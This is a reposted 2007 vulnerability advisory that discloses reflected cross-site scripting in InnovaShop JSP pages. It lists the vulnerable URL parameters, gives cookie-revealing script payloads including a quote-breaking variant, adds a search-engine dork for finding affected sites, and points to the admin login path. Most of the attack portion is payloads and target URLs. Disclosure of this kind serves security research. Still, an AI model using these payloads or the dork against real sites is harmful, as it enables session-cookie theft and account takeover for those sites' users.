Security Advisory: InnovaShop™® (mgs.jps) Cross Siting Scripting

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  HTML Injection Vuln in nssboard
  Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability
  Stringbeans (Portal) - Lang Parameter Cross-Site Scripting Vulnerability

From: Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date: 16.10.2007
Subject: InnovaShop™® (mgs.jps) Cross Siting Scripting

# InnovaShop™® (mgs.jps) Cross Siting Scripting
# Download:
# http://www.innovaage.com/
# http://www.innovaportal.com/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Site developed by InnovaAge™®" / "Powered by InnovaPortal©"
# Stop lammer

# Exploit In (XSS):

http://www.server/path/msg.jsp?msg=[XSS]
http://www.server/path/tc/contents/home001.jsp?contentid=[XSS]
http://www.server/innovashop/msg.jsp?msg=[XSS]
http://www.server/innovashop/tc/contents/home001.jsp?contentid=[XSS]
....all...

# Cross Siting Scripting (Code):

<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>

# Admin Login:

http://server/admin/

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

_________________________________________________________________
Grandes éxitos, superhéroes, imitaciones, cine y TV...
http://es.msn.kiwee.com/ Lo mejor para tu móvil.